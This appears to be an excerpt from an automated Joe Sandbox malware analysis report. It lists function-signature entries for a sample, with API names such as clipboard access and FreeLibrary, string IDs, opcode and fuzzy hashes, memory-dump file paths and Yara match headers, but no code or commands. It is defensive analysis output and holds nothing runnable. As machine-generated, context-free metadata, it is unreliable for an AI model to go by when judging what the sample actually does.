                                                                                                • Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearInit
                                                                                                • String ID: A$e$e$n$p$p$v$w$z$z
                                                                                                • API String ID: 2610073882-1114116150
                                                                                                • Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                • Instruction ID: f7f114f429909d1d8530ca22630bbc838de58076f5afe299f1dbbef83a500eab
                                                                                                • Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
                                                                                                • Instruction Fuzzy Hash: D841262160C7C18ED331CB38885879BBFD2ABA7324F088AADD4E9872D6D7794505C763
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 1006321803-0
                                                                                                • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_970000_C7B4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 1006321803-0
                                                                                                • Opcode ID: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                • Instruction ID: 90cce15511b010e1c79e2d2fe57c19624d21132c3f36d757cf8bb489c6b5dbf8
                                                                                                • Opcode Fuzzy Hash: c4fbd4c85c730b82bb0d4d983bd35fb8fa0bc5b81fa1c667f8f1a84b0218d30c
                                                                                                • Instruction Fuzzy Hash: 9651D4F1D08A928FD700AB7CC44936EFFA0AB52310F058A38D9999B792D3799954C7D3
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_C7B4.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: Wu
                                                                                                • API String ID: 3664257935-4083010176
                                                                                                • Opcode ID: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                                                                • Instruction ID: 023303e962689a797e65a05037f9f777abe5289ef5a5f996be967a955c3fa6a7
                                                                                                • Opcode Fuzzy Hash: 9afe16709b635edc46db45a4dc63f988e76f552cbb384c5dec0475105d426cf8
                                                                                                • Instruction Fuzzy Hash: DFC002BA818001AFCE016B61FC198187A23BB563067A809B4F80941536EB624D2BDA1E